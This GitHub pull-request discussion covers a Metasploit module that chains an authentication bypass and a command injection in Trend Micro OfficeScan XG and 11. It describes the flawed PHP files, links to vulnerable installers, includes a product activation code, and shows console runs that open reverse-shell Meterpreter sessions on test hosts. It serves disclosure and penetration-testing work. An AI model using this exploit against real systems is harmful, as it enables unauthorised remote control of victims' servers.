Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adding Trend Micro OfficeScan Widget RCE module #9052

Merged
merged 2 commits into from Oct 10, 2017

Conversation

@mmetince
Copy link
Contributor

commented Oct 8, 2017

This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.

Verification

  • Start msfconsole
  • use exploit/windows/http/trendmicro_officescan_exec
  • Set RHOST
  • Set LHOST
  • Run check
  • Verify that you are seeing The target appears to be vulnerable.
  • Run exploit
  • Verify that you are seeing PHPSESSIONID value.
  • Verify that you are getting meterpreter session.

Scenarios

msf > use exploit/windows/http/trendmicro_officescan_exec
msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.184
RHOST => 12.0.0.184
msf exploit(trendmicro_officescan_exec) > check
[*] 12.0.0.184:443 The target appears to be vulnerable.
msf exploit(trendmicro_officescan_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Exploiting authentication bypass
[+] Awesome. PHPSESSID=qkbkkkb281fn4019e02g80i156;
[*] Generating payload
[*] Trigerring command injection vulnerability
[*] Sending stage (179267 bytes) to 12.0.0.184
[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.184:50582) at 2017-10-08 10:13:27 +0300

meterpreter > sysinfo
Computer        : CME
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : tr_TR
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

@stevenseeley

This comment has been minimized.

Copy link
Contributor

commented Oct 8, 2017

Nice work! But I also bypassed the auth too! It’s just that ZDI ‘couldn’t repro’.

@ThePirateWhoSmellsOfSunflowers

This comment has been minimized.

Copy link

commented Oct 9, 2017

Hi!
Does the error {"response":"ERR","errcode":108,"timestamp":1507535648,"message":"Invalid http header token"} mean the server is patched ? Thanks.

🌻

@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented Oct 9, 2017

That make sense tho. I've done my homework before releasing the article tbh :-) I've diff'ed the source code between latest version and vulnerable version. I realised that command injection is fixed but authentication bypass still exist. Since none of the ZDI advisory didn't mention it, I've claimed that I've found it.

I thank you for your awesome work @stevenseeley 🤘.

## Scenarios

```
msf > use exploit/windows/http/trendmicro_officescan_exec

This comment has been minimized.

Copy link
@mmetince

mmetince Oct 9, 2017

Author Contributor

Going to change it to trendmicro_officescan_widget_exec. I'm just waiting a full review so I can fix them with a single commit.

This comment has been minimized.

Copy link
@stevenseeley

stevenseeley Oct 9, 2017

Contributor

Yeah I didn't report it because I wouldn't get paid. It's how it goes sometimes.

This comment has been minimized.

Copy link
@stevenseeley

stevenseeley Oct 9, 2017

Contributor

But you also found it, so congrats!


This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.

Trend Micro Officescan product have widget feature which is implemented with PHP. Talker.php takes ack and hash parameter but don't validate these values, which leads to an authentication bypass for widget. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.

This comment has been minimized.

Copy link
@h00die

h00die Oct 9, 2017

Contributor

The Trend Micro OfficeScan product has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.


If you don't see an affected version of OfficeScan, you can try to download it directly from following URL.

[ftp://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe](ftp://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe)

This comment has been minimized.

Copy link
@h00die

h00die Oct 9, 2017

Contributor

or [http](http://files.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe)

This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
terminal command under the context of the web server user.
The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro Officescan product

This comment has been minimized.

Copy link
@h00die

h00die Oct 9, 2017

Contributor

update per the comments in the .md file

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 9, 2017

looks like you need a valid activation code for this product to install it.

@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented Oct 9, 2017

@h00die You can get it through free trial submission. Or just use this OS-8Y6M-XYUDV-6S4ZK-Q2Z77-LH2UR-RCC7G .

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 9, 2017

trying imsva then i'll circle back

@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented Oct 9, 2017

Please stop review till new commit. I've got lead on @ThePirateWhoSmellsOfSunflowers 's question. There is two major version of OfficeScan ( 11 and XG ). This module has been implemented for only XG which is newer version. There is slightly difference between these versions. I'm about the finishing the work. We will have a single module that exploits both of them.

@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented Oct 9, 2017

Okay, I've made a lot of changes. I try my best to make it clear on comments in the source code @h00die .

You may need to test the module agains OfficeScan 11 as well. Here is the download link.ftp://download.trendmicro.com/products/officescan/OSCE11_1028_GM.exe You can use exactly same activation code .

Here is the output of the module. I've done my test against both versions.

Results for OfficeScan XG

msf > use exploit/windows/http/trendmicro_officescan_widget_exec 
msf exploit(trendmicro_officescan_widget_exec) > set RHOST 12.0.0.190
RHOST => 12.0.0.190
msf exploit(trendmicro_officescan_widget_exec) > check

[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan XG
[+] 12.0.0.190:443 The target is vulnerable.
msf exploit(trendmicro_officescan_widget_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan XG
[*] Exploiting authentication bypass
[+] Authenticated successfully bypassed.
[*] Generating payload
[*] Trigerring command injection vulnerability
[*] Sending stage (179267 bytes) to 12.0.0.190
[*] Meterpreter session 12 opened (12.0.0.1:4444 -> 12.0.0.190:49179) at 2017-10-09 22:16:05 +0300

meterpreter > sysinfo
Computer        : CAN-KOBAY
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : tr_TR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

Results for OfficeScan 11

msf exploit(trendmicro_officescan_widget_exec) > set RHOST 12.0.0.176
RHOST => 12.0.0.176
msf exploit(trendmicro_officescan_widget_exec) > set RPORT 4343
RPORT => 4343
msf exploit(trendmicro_officescan_widget_exec) > check

[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan 11
[+] 12.0.0.176:4343 The target is vulnerable.
msf exploit(trendmicro_officescan_widget_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan 11
[*] Exploiting authentication bypass
[+] Authenticated successfully bypassed.
[*] Generating payload
[*] Trigerring command injection vulnerability
[*] Sending stage (179267 bytes) to 12.0.0.176
[*] Meterpreter session 13 opened (12.0.0.1:4444 -> 12.0.0.176:49184) at 2017-10-09 22:17:11 +0300


meterpreter > 
meterpreter > sysinfo 
Computer        : CAN-KOBAY
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : tr_TR
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > 
@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 9, 2017

i'll get to this today. Want to add ftp://download.trendmicro.com/products/officescan/OSCE11_1028_GM.exe to the downloads list?

@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented Oct 9, 2017

I think it's unnecessary, they are showing only XG version on their download webpage. I've just found the older version on their ftp server.

@h00die h00die removed the delayed label Oct 9, 2017

@h00die h00die self-assigned this Oct 9, 2017

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 10, 2017

XG working.

msf exploit(trendmicro_officescan) > use exploit/windows/http/trendmicro_officescan_widget_exec 
msf exploit(trendmicro_officescan_widget_exec) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(trendmicro_officescan_widget_exec) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf exploit(trendmicro_officescan_widget_exec) > set rport 4343
rport => 4343
msf exploit(trendmicro_officescan_widget_exec) > check

[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan XG
[+] 1.1.1.1:4343 The target is vulnerable.
msf exploit(trendmicro_officescan_widget_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan XG
[*] Exploiting authentication bypass
[+] Authenticated successfully bypassed.
[*] Generating payload
[*] Trigerring command injection vulnerability
[*] Sending stage (179267 bytes) to 192.168.2.209
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 192.168.2.209:57314) at 2017-10-09 20:09:24 -0400

meterpreter > sysinfo
Computer        : WIN-OBKF2JFCDKL
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 10, 2017

11 also working.

msf exploit(trendmicro_officescan_widget_exec) > check

[*] Automatic targeting enabled. Trying to detect version.
[*] Selected target system : OfficeScan 11
[+] 1.1.1.1:4343 The target is vulnerable.
msf exploit(trendmicro_officescan_widget_exec) > set target 1
target => 1
msf exploit(trendmicro_officescan_widget_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4545 
[*] Exploiting authentication bypass
[+] Authenticated successfully bypassed.
[*] Generating payload
[*] Trigerring command injection vulnerability
[*] Sending stage (179267 bytes) to 1.1.1.1
[*] Meterpreter session 3 opened (2.2.2.2:4545 -> 1.1.1.1:49244) at 2017-10-09 20:39:55 -0400

meterpreter > sysinfo
Computer        : WIN-OBKF2JFCDKL
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows

@h00die h00die merged commit c14c93d into rapid7:master Oct 10, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details
h00die added a commit that referenced this pull request Oct 10, 2017
@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 10, 2017

Had one minor edit (file rename and added a L3 heading): b796c0b#diff-827d139b3afe7983b0907975f6241456

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 10, 2017

Release Notes

This PR adds an unauthenticated RCE for Trend Micro OfficeScan XG and 11 combining two different vulnerabilities (auth bypass, RCE) to achieve the shell.

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 10, 2017

excellent work @mmetince thanks for getting it all tackled in short time!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
4 participants
You can’t perform that action at this time.